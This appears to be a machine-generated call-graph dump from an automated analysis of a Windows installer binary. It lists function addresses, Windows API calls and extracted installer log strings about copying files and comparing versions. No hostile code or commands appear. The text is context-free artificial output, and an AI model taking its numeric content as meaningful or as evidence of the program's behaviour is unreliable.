51218 47b3fe 51213->51218 51219 47b3eb 51213->51219 51220->51156 51391->51143 51393 403804 51392->51393 51395 40382f 51392->51395 51394 4038a4 18 API calls 51393->51394 51394->51395 51395->51143 51396->51143 51401->51149 51402->51161 51403->51159 51404->51179 51480->51124 51482 47dd19 51481->51482 51485 47dd56 51481->51485 51513 455d0c 51482->51513 51485->50492 51487 47dd6d 51487->50492 51632 466714 51488->51632 51491->50502 51493 42f56c 51492->51493 51494 42f58f GetActiveWindow GetFocus 51493->51494 51495 41eea4 2 API calls 51494->51495 51496 42f5a6 51495->51496 51497 42f5c3 51496->51497 51498 42f5b3 RegisterClassA 51496->51498 51499 42f652 SetFocus 51497->51499 51500 42f5d1 CreateWindowExA 51497->51500 51498->51497 51502 403400 4 API calls 51499->51502 51500->51499 51501 42f604 51500->51501 51663 42427c 51501->51663 51504 42f66e 51502->51504 51508 494f3c 32 API calls 51504->51508 51505 42f62c 51506 42f634 CreateWindowExA 51505->51506 51506->51499 51507 42f64a ShowWindow 51506->51507 51507->51499 51508->50539 51669 44b514 51509->51669 51514 455d1d 51513->51514 51515 455d21 51514->51515 51516 455d2a 51514->51516 51539 455a10 51515->51539 51547 455af0 43 API calls 51516->51547 51519 455d27 51519->51485 51520 47d970 51519->51520 51525 47da6c 51520->51525 51531 47d9b0 51520->51531 51521 403420 4 API calls 51522 47db4f 51521->51522 51522->51487 51529 47dabd 51525->51529 51535 47da0f 51525->51535 51602 479630 51525->51602 51527 47c26c 57 API calls 51527->51529 51528 47c26c 57 API calls 51528->51531 51529->51525 51529->51527 51532 454100 34 API calls 51529->51532 51533 47da59 51529->51533 51530 47c26c 57 API calls 51537 47da18 51530->51537 51531->51525 51531->51528 51531->51535 51531->51537 51576 479770 51531->51576 51587 4798d4 51531->51587 51532->51529 51533->51535 51535->51521 51537->51530 51537->51531 51537->51533 51591 42c92c 51537->51591 51596 42c954 51537->51596 51601 47d67c 66 API calls 51537->51601 51548 42de1c 51539->51548 51541 455a2d 51542 455a7b 51541->51542 51551 455944 51541->51551 51542->51519 51545 455944 20 API calls 51546 455a5c RegCloseKey 51545->51546 51546->51519 51547->51519 51549 42de27 51548->51549 51550 42de2d RegOpenKeyExA 51548->51550 51549->51550 51550->51541 51556 42dd58 51551->51556 51553 403420 4 API calls 51554 4559f6 51553->51554 51554->51545 51555 45596c 51555->51553 51559 42dc00 51556->51559 51560 42dc26 RegQueryValueExA 51559->51560 51561 42dc6b 51560->51561 51566 42dc49 51560->51566 51562 403400 4 API calls 51561->51562 51564 42dd37 51562->51564 51563 42dc63 51565 403400 4 API calls 51563->51565 51564->51555 51565->51561 51566->51561 51566->51563 51567 4034e0 18 API calls 51566->51567 51568 403744 18 API calls 51566->51568 51567->51566 51569 42dca0 RegQueryValueExA 51568->51569 51569->51560 51570 42dcbc 51569->51570 51570->51561 51571 4038a4 18 API calls 51570->51571 51572 42dcfe 51571->51572 51573 42dd10 51572->51573 51575 403744 18 API calls 51572->51575 51574 403450 18 API calls 51573->51574 51574->51561 51575->51573 51577 479786 51576->51577 51578 479782 51576->51578 51579 403450 18 API calls 51577->51579 51578->51531 51580 479793 51579->51580 51581 4797b3 51580->51581 51582 479799 51580->51582 51584 479630 33 API calls 51581->51584 51583 479630 33 API calls 51582->51583 51585 4797af 51583->51585 51584->51585 51586 403400 4 API calls 51585->51586 51586->51578 51588 4798e0 51587->51588 51589 4798fb 51588->51589 51614 453344 18 API calls 51588->51614 51589->51531 51615 42c79c 51591->51615 51594 403778 18 API calls 51595 42c94e 51594->51595 51595->51537 51597 42c79c IsDBCSLeadByte 51596->51597 51598 42c964 51597->51598 51599 403778 18 API calls 51598->51599 51600 42c975 51599->51600 51600->51537 51601->51537 51603 47964b 51602->51603 51604 47970a 51603->51604 51607 47967c 51603->51607 51627 4794e4 33 API calls 51603->51627 51604->51525 51606 4796a1 51610 4796c2 51606->51610 51629 4794e4 33 API calls 51606->51629 51607->51606 51628 4794e4 33 API calls 51607->51628 51610->51604 51611 479702 51610->51611 51630 453344 18 API calls 51610->51630 51621 479368 51611->51621 51614->51589 51616 42c67c IsDBCSLeadByte 51615->51616 51617 42c7b1 51616->51617 51618 42c7fb 51617->51618 51620 42c444 IsDBCSLeadByte 51617->51620 51618->51594 51620->51617 51622 4793a3 51621->51622 51623 403450 18 API calls 51622->51623 51624 4793c8 51623->51624 51631 477a58 33 API calls 51624->51631 51626 479409 51626->51604 51627->51607 51628->51606 51629->51610 51630->51611 51631->51626 51633 403494 4 API calls 51632->51633 51634 466742 51633->51634 51649 42dbc8 51634->51649 51637 42dbc8 19 API calls 51638 466766 51637->51638 51639 466600 33 API calls 51638->51639 51640 466770 51639->51640 51641 42dbc8 19 API calls 51640->51641 51642 46677f 51641->51642 51652 466678 51642->51652 51645 42dbc8 19 API calls 51646 466798 51645->51646 51647 403400 4 API calls 51646->51647 51648 4667ad 51647->51648 51648->50496 51656 42db10 51649->51656 51653 466698 51652->51653 51654 4078f4 33 API calls 51653->51654 51655 4666e2 51654->51655 51655->51645 51657 42db30 51656->51657 51658 42dbbb 51656->51658 51657->51658 51659 4037b8 18 API calls 51657->51659 51661 403800 18 API calls 51657->51661 51662 42c444 IsDBCSLeadByte 51657->51662 51658->51637 51659->51657 51661->51657 51662->51657 51664 4242ae 51663->51664 51665 42428e GetWindowTextA 51663->51665 51667 403494 4 API calls 51664->51667 51666 4034e0 18 API calls 51665->51666 51668 4242ac 51666->51668 51667->51668 51668->51505 51672 44b38c 51669->51672 51673 44b3bf 51672->51673 51674 414ae8 18 API calls 51673->51674 51675 44b3d2 51674->51675 51676 44b3ff GetDC 51675->51676 51677 40357c 18 API calls 51675->51677 51683 41a1e8 51676->51683 51677->51676 51680 44b430 51691 44b0c0 51680->51691 51684 41a213 51683->51684 51685 41a2af 51683->51685 51702 403520 51684->51702 51686 403400 4 API calls 51685->51686 51687 41a2c7 SelectObject 51686->51687 51687->51680 51689 41a26b 51690 41a2a3 CreateFontIndirectA 51689->51690 51690->51685 51692 44b0d7 51691->51692 51703 4034e0 18 API calls 51702->51703 51704 40352a 51703->51704 51704->51689 51707 4652d7 51705->51707 51706 4653b2 51716 46708c 51706->51716 51707->51706 51710 465327 51707->51710 51728 421a1c 51707->51728 51711 465361 51710->51711 51712 46536c 51710->51712 51715 46536a 51710->51715 51713 421a1c 21 API calls 51711->51713 51714 421a1c 21 API calls 51712->51714 51713->51715 51714->51715 51715->51706 51734 4185b8 21 API calls 51715->51734 51717 4670bc 51716->51717 51718 46709d 51716->51718 51717->50557 51719 414b18 18 API calls 51718->51719 51720 4670ab 51719->51720 51721 414b18 18 API calls 51720->51721 51721->51717 51732 421a74 51728->51732 51733 421a2a 51728->51733 51729 421a59 51729->51732 51743 421d28 SetFocus GetFocus 51729->51743 51732->51710 51733->51729 51735 408cbc 51733->51735 51734->51706 51736 408cc8 51735->51736 51744 406dec LoadStringA 51736->51744 51739 403450 18 API calls 51740 408cf9 51739->51740 51741 403400 4 API calls 51740->51741 51742 408d0e 51741->51742 51742->51729 51743->51732 51745 4034e0 18 API calls 51744->51745 51746 406e19 51745->51746 51746->51739 51795 46c7a5 51794->51795 51796 46c7f2 51795->51796 51797 414ae8 18 API calls 51795->51797 51799 403420 4 API calls 51796->51799 51798 46c7bb 51797->51798 52001 466924 20 API calls 51798->52001 51801 46c89c 51799->51801 51801->50637 51993 408be0 19 API calls 51801->51993 51802 46c7c3 51803 414b18 18 API calls 51802->51803 51804 46c7d1 51803->51804 51805 46c7de 51804->51805 51807 46c7f7 51804->51807 52002 47efd0 56 API calls 51805->52002 51808 46c80f 51807->51808 51809 466a08 CharNextA 51807->51809 52003 47efd0 56 API calls 51808->52003 51811 46c80b 51809->51811 51811->51808 51812 46c825 51811->51812 51813 46c841 51812->51813 51814 46c82b 51812->51814 51815 42c99c CharNextA 51813->51815 52004 47efd0 56 API calls 51814->52004 51817 46c84e 51815->51817 51817->51796 52005 466a94 18 API calls 51817->52005 51819 46c865 51820 451458 18 API calls 51819->51820 51821 46c872 51820->51821 52006 47efd0 56 API calls 51821->52006 51824 4241ed SetActiveWindow 51823->51824 51828 424223 51823->51828 52007 42364c 51824->52007 51828->50649 51828->50650 51829 42420a 51829->51828 51830 42421d SetFocus 51829->51830 51830->51828 51832 482505 51831->51832 51833 4824d7 51831->51833 51835 475bd0 51832->51835 52020 494cec 32 API calls 51833->52020 52021 457d10 51835->52021 51839 475c26 51994->50645 52001->51802 52002->51796 52003->51796 52004->51796 52005->51819 52006->51796 52016 4235f8 SystemParametersInfoA 52007->52016 52010 423665 ShowWindow 52012 423670 52010->52012 52013 423677 52010->52013 52019 423628 SystemParametersInfoA 52012->52019 52015 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 52013->52015 52015->51829 52017 423616 52016->52017 52017->52010 52018 423628 SystemParametersInfoA 52017->52018 52018->52010 52019->52013 52020->51832 52022 457d3c 52021->52022 52037 457e44 52021->52037 52493 457a0c GetSystemTimeAsFileTime FileTimeToSystemTime 52022->52493 52023 457e95 52026 403400 4 API calls 52023->52026 52028 457eaa 52026->52028 52027 457d44 52029 4078f4 33 API calls 52027->52029 52042 4072a8 52028->52042 52030 457db5 52029->52030 52494 457d00 34 API calls 52030->52494 52032 457e0b 52033 457e3a 52032->52033 52039 403778 18 API calls 52032->52039 52034 403778 18 API calls 52036 457dbd 52034->52036 52036->52032 52036->52034 52038 457d00 34 API calls 52036->52038 52037->52023 52497 45757c 20 API calls 52037->52497 52038->52036 52043 403738 52042->52043 52044 4072b2 SetCurrentDirectoryA 52043->52044 52044->51839 52493->52027 52494->52036 52497->52023 53694 431eec 53655->53694 53657 403400 4 API calls 53658 43da76 53657->53658 53658->50706 53658->50707 53659 43d9f2 53659->53657 53661 431bd6 53660->53661 53662 402648 18 API calls 53661->53662 53663 431c06 53662->53663 53664 4947f8 53663->53664 53665 4948cd 53664->53665 53669 494812 53664->53669 53671 494910 53665->53671 53667 433d6c 18 API calls 53667->53669 53669->53665 53669->53667 53670 403450 18 API calls 53669->53670 53699 408c0c 18 API calls 53669->53699 53700 431ca0 53669->53700 53670->53669 53672 49492c 53671->53672 53708 433d6c 53672->53708 53674 494931 53675 431ca0 18 API calls 53674->53675 53676 49493c 53675->53676 53677 43d594 53676->53677 53678 43d5c1 53677->53678 53683 43d5b3 53677->53683 53678->50717 53679 43d63d 53685 43d6f7 53679->53685 53711 447084 53679->53711 53681 43d688 53717 43dd50 53681->53717 53683->53678 53683->53679 53684 447084 18 API calls 53683->53684 53684->53683 53686 43d8fd 53685->53686 53688 43d8de 53685->53688 53735 447024 18 API calls 53685->53735 53686->53678 53737 447024 18 API calls 53686->53737 53736 447024 18 API calls 53688->53736 53691->50719 53692->50721 53693->50708 53695 403494 4 API calls 53694->53695 53696 431efb 53695->53696 53697 431f25 53696->53697 53698 403744 18 API calls 53696->53698 53697->53659 53698->53696 53699->53669 53701 431cc0 53700->53701 53702 431cae 53700->53702 53704 431ce2 53701->53704 53707 431c40 18 API calls 53701->53707 53706 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53702->53706 53704->53669 53706->53701 53707->53704 53709 402648 18 API calls 53708->53709 53710 433d7b 53709->53710 53710->53674 53712 4470a3 53711->53712 53713 4470aa 53711->53713 53738 446e30 18 API calls 53712->53738 53715 431ca0 18 API calls 53713->53715 53716 4470ba 53715->53716 53716->53681 53718 43dd6c 53717->53718 53723 43dd99 53717->53723 53719 402660 4 API calls 53718->53719 53718->53723 53719->53718 53720 43ddce 53720->53685 53722 43fea5 53722->53720 53748 447024 18 API calls 53722->53748 53723->53720 53723->53722 53724 447024 18 API calls 53723->53724 53726 43c938 18 API calls 53723->53726 53730 433d18 18 API calls 53723->53730 53731 433b18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53723->53731 53732 436650 18 API calls 53723->53732 53733 431c40 18 API calls 53723->53733 53734 446e30 18 API calls 53723->53734 53739 4396e0 53723->53739 53745 436e4c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53723->53745 53746 43dc48 32 API calls 53723->53746 53747 433d34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53723->53747 53724->53723 53726->53723 53730->53723 53731->53723 53732->53723 53733->53723 53734->53723 53735->53685 53736->53686 53737->53686 53738->53713 53740 4396e9 53739->53740 53741 403400 4 API calls 53740->53741 53745->53723 53746->53723 53747->53723 53748->53722 53751 41fb58 53752 41fb61 53751->53752 53755 41fdfc 53752->53755 53754 41fb6e 53756 41feee 53755->53756 53757 41fe13 53755->53757 53756->53754 53757->53756 53776 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53757->53776 53759 41fe49 53760 41fe73 53759->53760 53761 41fe4d 53759->53761 53786 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53760->53786 53777 41fb9c 53761->53777 53765 41fe81 53766 41fe85 53765->53766 53767 41feab 53765->53767 53769 41fb9c 10 API calls 53766->53769 53770 41fb9c 10 API calls 53767->53770 53768 41fb9c 10 API calls 53771 41fe71 53768->53771 53772 41fe97 53769->53772 53773 41febd 53770->53773 53771->53754 53774 41fb9c 10 API calls 53772->53774 53775 41fb9c 10 API calls 53773->53775 53774->53771 53775->53771 53776->53759 53778 41fbb7 53777->53778 53779 41f93c 4 API calls 53778->53779 53780 41fbcd 53778->53780 53779->53780 53787 41f93c 53780->53787 53782 41fc15 53783 41fc38 SetScrollInfo 53782->53783 53795 41fa9c 53783->53795 53786->53765 53788 4181e0 53787->53788 53789 41f959 GetWindowLongA 53788->53789 53790 41f996 53789->53790 53791 41f976 53789->53791 53807 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53790->53807 53806 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53791->53806 53794 41f982 53794->53782 53796 41faaa 53795->53796 53797 41fab2 53795->53797 53796->53768 53798 41faf1 53797->53798 53799 41fae1 53797->53799 53803 41faef 53797->53803 53809 417e48 IsWindowVisible ScrollWindow SetWindowPos 53798->53809 53808 417e48 IsWindowVisible ScrollWindow SetWindowPos 53799->53808 53800 41fb31 GetScrollPos 53800->53796 53804 41fb3c 53800->53804 53803->53800 53805 41fb4b SetScrollPos 53804->53805 53805->53796 53806->53794 53807->53794 53808->53803 53809->53803 53810 420598 53811 4205ab 53810->53811 53831 415b30 53811->53831 53813 4206f2 53814 420709 53813->53814 53838 4146d4 KiUserCallbackDispatcher 53813->53838 53818 420720 53814->53818 53839 414718 KiUserCallbackDispatcher 53814->53839 53815 420651 53836 420848 34 API calls 53815->53836 53816 4205e6 53816->53813 53816->53815 53824 420642 MulDiv 53816->53824 53821 420742 53818->53821 53840 420060 12 API calls 53818->53840 53822 42066a 53822->53813 53837 420060 12 API calls 53822->53837 53835 41a304 19 API calls 53824->53835 53827 420687 53828 4206a3 MulDiv 53827->53828 53829 4206c6 53827->53829 53828->53829 53829->53813 53830 4206cf MulDiv 53829->53830 53830->53813 53832 415b42 53831->53832 53841 414470 53832->53841 53834 415b5a 53834->53816 53835->53815 53836->53822 53837->53827 53838->53814 53839->53818 53840->53821 53842 41448a 53841->53842 53845 410458 53842->53845 53844 4144a0 53844->53834 53848 40dca4 53845->53848 53847 41045e 53847->53844 53849 40dd06 53848->53849 53850 40dcb7 53848->53850 53855 40dd14 53849->53855 53853 40dd14 33 API calls 53850->53853 53854 40dce1 53853->53854 53854->53847 53856 40dd24 53855->53856 53858 40dd3a 53856->53858 53867 40e09c 53856->53867 53883 40d5e0 53856->53883 53886 40df4c 53858->53886 53861 40d5e0 19 API calls 53862 40dd42 53861->53862 53862->53861 53863 40ddae 53862->53863 53889 40db60 53862->53889 53865 40df4c 19 API calls 53863->53865 53866 40dd10 53865->53866 53866->53847 53903 40e96c 53867->53903 53869 403778 18 API calls 53871 40e0d7 53869->53871 53870 40e18d 53872 40e1b7 53870->53872 53873 40e1a8 53870->53873 53871->53869 53871->53870 53966 40d774 19 API calls 53871->53966 53967 40e080 19 API calls 53871->53967 53963 40ba24 53872->53963 53912 40e3c0 53873->53912 53879 40e1b5 53880 403400 4 API calls 53879->53880 53881 40e25c 53880->53881 53881->53856 53884 40ea08 19 API calls 53883->53884 53885 40d5ea 53884->53885 53885->53856 54000 40d4bc 53886->54000 54009 40df54 53889->54009 53892 40e96c 19 API calls 53893 40db9e 53892->53893 53894 40e96c 19 API calls 53893->53894 53895 40dba9 53894->53895 53896 40dbc4 53895->53896 53897 40dbbb 53895->53897 53902 40dbc1 53895->53902 54016 40d9d8 53896->54016 54019 40dac8 33 API calls 53897->54019 53900 403420 4 API calls 53901 40dc8f 53900->53901 53901->53862 53902->53900 53969 40d780 53903->53969 53906 4034e0 18 API calls 53907 40e98f 53906->53907 53908 403744 18 API calls 53907->53908 53909 40e996 53908->53909 53910 40d780 19 API calls 53909->53910 53911 40e9a4 53910->53911 53911->53871 53913 40e3ec 53912->53913 53915 40e3f6 53912->53915 53974 40d440 19 API calls 53913->53974 53916 40e511 53915->53916 53917 40e495 53915->53917 53918 40e4f6 53915->53918 53919 40e576 53915->53919 53920 40e438 53915->53920 53921 40e4d9 53915->53921 53922 40e47a 53915->53922 53923 40e4bb 53915->53923 53934 40e45c 53915->53934 53926 40d764 19 API calls 53916->53926 53982 40de24 19 API calls 53917->53982 53987 40e890 19 API calls 53918->53987 53930 40d764 19 API calls 53919->53930 53975 40d764 53920->53975 53985 40e9a8 19 API calls 53921->53985 53981 40d818 19 API calls 53922->53981 53984 40dde4 19 API calls 53923->53984 53935 40e519 53926->53935 53929 403400 4 API calls 53936 40e5eb 53929->53936 53937 40e57e 53930->53937 53933 40e4a0 53983 40d470 19 API calls 53933->53983 53934->53929 53943 40e523 53935->53943 53944 40e51d 53935->53944 53936->53879 53945 40e582 53937->53945 53946 40e59b 53937->53946 53938 40e4e4 53986 409d38 18 API calls 53938->53986 53940 40e461 53980 40ded8 19 API calls 53940->53980 53941 40e444 53978 40de24 19 API calls 53941->53978 53988 40ea08 53943->53988 53951 40e521 53944->53951 53952 40e53c 53944->53952 53954 40ea08 19 API calls 53945->53954 53994 40de24 19 API calls 53946->53994 53992 40de24 19 API calls 53951->53992 53955 40ea08 19 API calls 53952->53955 53954->53934 53957 40e544 53955->53957 53956 40e44f 53979 40e26c 19 API calls 53956->53979 53991 40d8a0 19 API calls 53957->53991 53960 40e566 53993 40e2d4 18 API calls 53960->53993 53995 40b9d0 53963->53995 53966->53871 53967->53871 53968 40d774 19 API calls 53968->53879 53970 40d78b 53969->53970 53971 40d7c5 53970->53971 53973 40d7cc 19 API calls 53970->53973 53971->53906 53973->53970 53974->53915 53976 40ea08 19 API calls 53975->53976 53977 40d76e 53976->53977 53977->53940 53977->53941 53978->53956 53979->53934 53980->53934 53981->53934 53982->53933 53983->53934 53984->53934 53985->53938 53986->53934 53987->53934 53989 40d780 19 API calls 53988->53989 53990 40ea15 53989->53990 53990->53934 53991->53934 53992->53960 53993->53934 53994->53934 53996 40b9e2 53995->53996 53998 40ba07 53995->53998 53996->53998 53999 40ba84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53996->53999 53998->53879 53998->53968 53999->53998 54001 40ea08 19 API calls 54000->54001 54002 40d4c9 54001->54002 54003 40d4dc 54002->54003 54007 40eb0c 19 API calls 54002->54007 54003->53862 54005 40d4d7 54008 40d458 19 API calls 54005->54008 54007->54005 54008->54003 54010 40d764 19 API calls 54009->54010 54011 40df6b 54010->54011 54012 40db93 54011->54012 54013 40ea08 19 API calls 54011->54013 54012->53892 54014 40df78 54013->54014 54014->54012 54020 40ded8 19 API calls 54014->54020 54021 40ab7c 33 API calls 54016->54021 54018 40da00 54018->53902 54019->53902 54020->54012 54021->54018 56226 41363c SetWindowLongA GetWindowLongA 56227 41367b GetWindowLongA 56226->56227 56229 413699 SetPropA SetPropA 56226->56229 56228 41368a SetWindowLongA 56227->56228 56227->56229 56228->56229 56233 41f39c 56229->56233 56238 415270 56233->56238 56245 423c0c 56233->56245 56339 423a84 56233->56339 56234 4136e9 56239 41527d 56238->56239 56240 4152e3 56239->56240 56241 4152d8 56239->56241 56244 4152e1 56239->56244 56346 424b8c 13 API calls 56240->56346 56241->56244 56347 41505c 60 API calls 56241->56347 56244->56234 56250 423c42 56245->56250 56248 423cec 56251 423cf3 56248->56251 56252 423d27 56248->56252 56249 423c8d 56253 423c93 56249->56253 56254 423d50 56249->56254 56265 423c63 56250->56265 56348 423b68 56250->56348 56255 423cf9 56251->56255 56290 423fb1 56251->56290 56258 423d32 56252->56258 56259 42409a IsIconic 56252->56259 56256 423cc5 56253->56256 56257 423c98 56253->56257 56260 423d62 56254->56260 56261 423d6b 56254->56261 56263 423f13 SendMessageA 56255->56263 56264 423d07 56255->56264 56256->56265 56288 423cde 56256->56288 56289 423e3f 56256->56289 56267 423df6 56257->56267 56268 423c9e 56257->56268 56269 4240d6 56258->56269 56270 423d3b 56258->56270 56259->56265 56266 4240ae GetFocus 56259->56266 56271 423d78 56260->56271 56272 423d69 56260->56272 56355 424194 11 API calls 56261->56355 56263->56265 56264->56265 56291 423cc0 56264->56291 56319 423f56 56264->56319 56265->56234 56266->56265 56276 4240bf 56266->56276 56360 423b84 NtdllDefWindowProc_A 56267->56360 56277 423ca7 56268->56277 56278 423e1e PostMessageA 56268->56278 56369 424850 WinHelpA PostMessageA 56269->56369 56274 4240ed 56270->56274 56270->56291 56275 4241dc 11 API calls 56271->56275 56356 423b84 NtdllDefWindowProc_A 56272->56356 56286 4240f6 56274->56286 56287 42410b 56274->56287 56275->56265 56368 41eff4 GetCurrentThreadId EnumThreadWindows 56276->56368 56283 423cb0 56277->56283 56284 423ea5 56277->56284 56361 423b84 NtdllDefWindowProc_A 56278->56361 56296 423cb9 56283->56296 56297 423dce IsIconic 56283->56297 56298 423eae 56284->56298 56299 423edf 56284->56299 56285 423e39 56285->56265 56300 4244d4 19 API calls 56286->56300 56370 42452c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 56287->56370 56288->56291 56292 423e0b 56288->56292 56352 423b84 NtdllDefWindowProc_A 56289->56352 56290->56265 56310 423fd7 IsWindowEnabled 56290->56310 56291->56265 56354 423b84 NtdllDefWindowProc_A 56291->56354 56305 424178 26 API calls 56292->56305 56295 4240c6 56295->56265 56307 4240ce SetFocus 56295->56307 56296->56291 56308 423d91 56296->56308 56301 423dea 56297->56301 56302 423dde 56297->56302 56363 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56298->56363 56353 423b84 NtdllDefWindowProc_A 56299->56353 56300->56265 56359 423b84 NtdllDefWindowProc_A 56301->56359 56358 423bc0 29 API calls 56302->56358 56305->56265 56306 423e45 56314 423e83 56306->56314 56315 423e61 56306->56315 56307->56265 56308->56265 56357 422c4c ShowWindow PostMessageA PostQuitMessage 56308->56357 56310->56265 56317 423fe5 56310->56317 56313 423ee5 56318 423efd 56313->56318 56326 41eea4 2 API calls 56313->56326 56321 423a84 6 API calls 56314->56321 56362 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56315->56362 56316 423eb6 56323 423ec8 56316->56323 56324 41ef58 6 API calls 56316->56324 56331 423fec IsWindowVisible 56317->56331 56327 423a84 6 API calls 56318->56327 56319->56265 56328 423f78 IsWindowEnabled 56319->56328 56330 423e8b PostMessageA 56321->56330 56364 423b84 NtdllDefWindowProc_A 56323->56364 56324->56323 56326->56318 56327->56265 56328->56265 56332 423f86 56328->56332 56329 423e69 PostMessageA 56329->56265 56330->56265 56331->56265 56333 423ffa GetFocus 56331->56333 56365 412310 21 API calls 56332->56365 56335 4181e0 56333->56335 56336 42400f SetFocus 56335->56336 56366 415240 56336->56366 56340 423b0d 56339->56340 56341 423a94 56339->56341 56340->56234 56341->56340 56342 423a9a EnumWindows 56341->56342 56342->56340 56343 423ab6 GetWindow GetWindowLongA 56342->56343 56371 423a1c GetWindow 56342->56371 56344 423ad5 56343->56344 56344->56340 56345 423b01 SetWindowPos 56344->56345 56345->56340 56345->56344 56346->56244 56347->56244 56349 423b7d 56348->56349 56350 423b72 56348->56350 56349->56248 56349->56249 56350->56349 56351 408720 21 API calls 56350->56351 56351->56349 56352->56306 56353->56313 56354->56265 56355->56265 56356->56265 56357->56265 56358->56265 56359->56265 56360->56265 56361->56285 56362->56329 56363->56316 56364->56265 56365->56265 56367 41525b SetFocus 56366->56367 56367->56265 56368->56295 56369->56285 56370->56285 56372 423a49 56371->56372 56373 423a3d GetWindowLongA 56371->56373 56373->56372 56374 4809f7 56375 480a00 56374->56375 56376 480a2b 56374->56376 56375->56376 56377 480a1d 56375->56377 56379 480a6a 56376->56379 56748 47f4a4 18 API calls 56376->56748 56746 476c50 203 API calls 56377->56746 56380 480a8e 56379->56380 56383 480a81 56379->56383 56384 480a83 56379->56384 56386 480aca 56380->56386 56387 480aac 56380->56387 56382 480a5d 56749 47f50c 56 API calls 56382->56749 56391 47f4e8 56 API calls 56383->56391 56750 47f57c 56 API calls 56384->56750 56385 480a22 56385->56376 56747 408be0 19 API calls 56385->56747 56753 47f33c 38 API calls 56386->56753 56392 480ac1 56387->56392 56751 47f50c 56 API calls 56387->56751 56391->56380 56752 47f33c 38 API calls 56392->56752 56396 480ac8 56397 480ada 56396->56397 56398 480ae0 56396->56398 56399 480ade 56397->56399 56402 47f4e8 56 API calls 56397->56402 56398->56399 56400 47f4e8 56 API calls 56398->56400 56500 47c66c 56399->56500 56400->56399 56402->56399 56501 42d898 GetWindowsDirectoryA 56500->56501 56502 47c690 56501->56502 56503 403450 18 API calls 56502->56503 56504 47c69d 56503->56504 56505 42d8c4 GetSystemDirectoryA 56504->56505 56506 47c6a5 56505->56506 56507 403450 18 API calls 56506->56507 56508 47c6b2 56507->56508 56509 42d8f0 6 API calls 56508->56509 56510 47c6ba 56509->56510 56511 403450 18 API calls 56510->56511 56512 47c6c7 56511->56512 56513 47c6d0 56512->56513 56514 47c6ec 56512->56514 56785 42d208 56513->56785 56516 403400 4 API calls 56514->56516 56518 47c6ea 56516->56518 56519 47c731 56518->56519 56521 42c8cc 19 API calls 56518->56521 56765 47c4f4 56519->56765 56520 403450 18 API calls 56520->56518 56523 47c70c 56521->56523 56525 403450 18 API calls 56523->56525 56527 47c719 56525->56527 56526 403450 18 API calls 56528 47c74d 56526->56528 56527->56519 56530 403450 18 API calls 56527->56530 56529 47c76b 56528->56529 56531 4035c0 18 API calls 56528->56531 56532 47c4f4 22 API calls 56529->56532 56530->56519 56531->56529 56533 47c77a 56532->56533 56534 403450 18 API calls 56533->56534 56535 47c787 56534->56535 56536 47c7af 56535->56536 56537 42c3fc 19 API calls 56535->56537 56538 47c816 56536->56538 56541 47c4f4 22 API calls 56536->56541 56539 47c79d 56537->56539 56540 47c8de 56538->56540 56545 47c836 SHGetKnownFolderPath 56538->56545 56544 4035c0 18 API calls 56539->56544 56542 47c8e7 56540->56542 56543 47c908 56540->56543 56546 47c7c7 56541->56546 56547 42c3fc 19 API calls 56542->56547 56548 42c3fc 19 API calls 56543->56548 56544->56536 56549 47c850 56545->56549 56550 47c88b SHGetKnownFolderPath 56545->56550 56551 403450 18 API calls 56546->56551 56552 47c8f4 56547->56552 56553 47c915 56548->56553 56795 403ba4 21 API calls 56549->56795 56550->56540 56555 47c8a5 56550->56555 56560 47c7d4 56551->56560 56796 403ba4 21 API calls 56555->56796 56558 47c86b CoTaskMemFree 56559 47c7e7 56560->56559 56793 453344 18 API calls 56560->56793 56746->56385 56748->56382 56749->56379 56750->56380 56751->56392 56752->56396 56753->56396 56766 42de1c RegOpenKeyExA 56765->56766 56767 47c51a 56766->56767 56768 47c540 56767->56768 56769 47c51e 56767->56769 56771 403400 4 API calls 56768->56771 56770 42dd4c 20 API calls 56769->56770 56772 47c52a 56770->56772 56773 47c547 56771->56773 56774 47c535 RegCloseKey 56772->56774 56775 403400 4 API calls 56772->56775 56773->56526 56774->56773 56775->56774 56786 4038a4 18 API calls 56785->56786 56787 42d21b 56786->56787 56788 42d232 GetEnvironmentVariableA 56787->56788 56792 42d245 56787->56792 56797 42dbd0 18 API calls 56787->56797 56788->56787 56789 42d23e 56788->56789 56790 403400 4 API calls 56789->56790 56790->56792 56792->56520 56793->56559 56795->56558 56797->56787
                                                                                        Strings
                                                                                        • Time stamp of our file: %s, xrefs: 0047099B
                                                                                        • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470CD0
                                                                                        • Dest file exists., xrefs: 004709BB
                                                                                        • Version of our file: %u.%u.%u.%u, xrefs: 00470AF0
                                                                                        • Time stamp of existing file: (failed to read), xrefs: 00470A37
                                                                                        • Incrementing shared file count (32-bit)., xrefs: 004715A5
                                                                                        • , xrefs: 00470BCF, 00470DA0, 00470E1E
                                                                                        • Installing the file., xrefs: 00470F09
                                                                                        • Dest filename: %s, xrefs: 00470894
                                                                                        • @, xrefs: 004707B0
                                                                                        • Dest file is protected by Windows File Protection., xrefs: 004708ED
                                                                                        • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470E96
                                                                                        • Same version. Skipping., xrefs: 00470CE5
                                                                                        • -- File entry --, xrefs: 004706FB
                                                                                        • Non-default bitness: 32-bit, xrefs: 004708BB
                                                                                        • Incrementing shared file count (64-bit)., xrefs: 0047158C
                                                                                        • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470CB5
                                                                                        • Version of existing file: (none), xrefs: 00470CFA
                                                                                        • Uninstaller requires administrator: %s, xrefs: 0047118F
                                                                                        • InUn, xrefs: 0047115F
                                                                                        • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470CC4
                                                                                        • .tmp, xrefs: 00470FB7
                                                                                        • Same time stamp. Skipping., xrefs: 00470D55
